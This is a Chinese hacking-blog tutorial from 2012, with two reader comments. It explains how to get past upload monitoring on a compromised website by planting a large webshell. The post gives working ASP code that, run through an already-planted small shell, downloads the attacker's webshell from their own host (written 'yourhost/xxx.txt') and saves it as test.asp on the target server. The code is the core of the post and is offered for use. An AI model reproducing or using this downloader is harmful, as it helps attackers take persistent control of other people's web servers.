绕过系统限制上传大马(适合菜鸟收藏)

作者:hack1990 时间:12-02-28 阅读数:893人阅读

很多次有人问,小马写上去了,为什么大马却写不上。        
       很多时候,由于我们上传小马后因系统限制,却无法上传大马。
       那就用下载的方法,突破一流监控系统的限制。先将我们的大马改成txt上传到自己的空间。再用一句话或者小马上传一个asp文件到目标网站,内容如下:

      <%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://yourhost/xxx.txt",False     //你的主机地址 和 xxx.txt的大马
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("test.asp"),2     //自定义的asp文件名
set sGet = nothing
set sPOST = nothing
response.Write("Download to succeed!")         //提示:提示下载成功后 有时可能要多刷新几下 ^^
        %>

       访问新建立的asp文件后,就可以得到同一路径下我们所要上传的大马test.asp

评论列表

  •  
    发布于 2012-03-04 15:11:12  回复
  • 这个不错.
  •  
    发布于 2012-05-18 19:32:40  回复
  • Download to succeed! 提示上传成功 但是这里的test.asp 还是不能访问 sGet.SaveToFile Server.MapPath("test.asp"),
    本文来源于iick's blog http://www.hack1990.com/ , 原文地址:http://www.hack1990.com/cat_1/989.html
    求 解释

发表评论